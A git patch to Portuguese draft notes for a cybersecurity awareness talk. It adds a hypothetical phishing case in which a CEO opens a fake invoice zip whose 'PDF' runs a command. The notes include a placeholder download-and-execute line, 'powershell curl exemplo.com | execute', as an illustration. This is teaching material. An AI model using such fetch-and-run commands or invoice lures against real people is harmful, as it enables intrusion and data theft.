From adfd65ea7152025d2f311056dfac9af0fac9c5b2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lvaro=20Ant=C3=B4nio?= Date: Sun, 22 Feb 2026 14:02:10 -0300 Subject: [PATCH] vault backup: 2026-02-22 14:02:10 --- Palestras/Cybersegurança na prática.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/Palestras/Cybersegurança na prática.md b/Palestras/Cybersegurança na prática.md index 056b489..8fb302c 100644 --- a/Palestras/Cybersegurança na prática.md +++ b/Palestras/Cybersegurança na prática.md @@ -34,11 +34,16 @@ Coloque na sua cabeça: ### Exercício mental O que é mais fácil fazer para conseguir seus dados bancários? 1. Hackear a agência do Nubank - + ![](../Pasted%20image%2020260222135655.png) 2. Descobrir qual jogador do Real Madrid você seria. ![](../Pasted%20image%2020260222135622.png) -## Parte 3: +## Parte 3: Conheça seu alvo +Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente resposta será +> "Conheça seu inimigo" +### Exemplo de caso real +Um CEO de uma empresa de Uberlândia está sentado no seu escritório fazendo seu trabalho. De vez em quando conversa com os funcionários. Reclama que o ar condicionado está muito fraco. Enquanto isso ele checa seus emails. Dentro deles há um email que passaria despercebido. "Nota fiscal da Empresa X (inventar)". Inocentemente ele abre, baixa o arquivo zip, e dentro tem um arquivo. `nf-210230120310240102.pdf`. O que ele não percebe é que não é um arquivo PDF, e sim um link para um endereço peculiar. Esse endereço não é da internet, e sim uma linha de comando. +`powershell curl exemplo.com | execute` (melhorar). Sem perceber, ele abre. Uma tela do prompt de comando pisca em sua tela por um segundo. Pronto. Agora hackers tem acesso à sua máquina. Podem passar dias despercebidos enquanto colhem inteligência, dados de clientes, e qualquer outra informação que possa ser útil no futuro para extorquir ou aplicar golpes à empresa. ## Parte 4: Vulnerabilidades do Mundo Real ### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.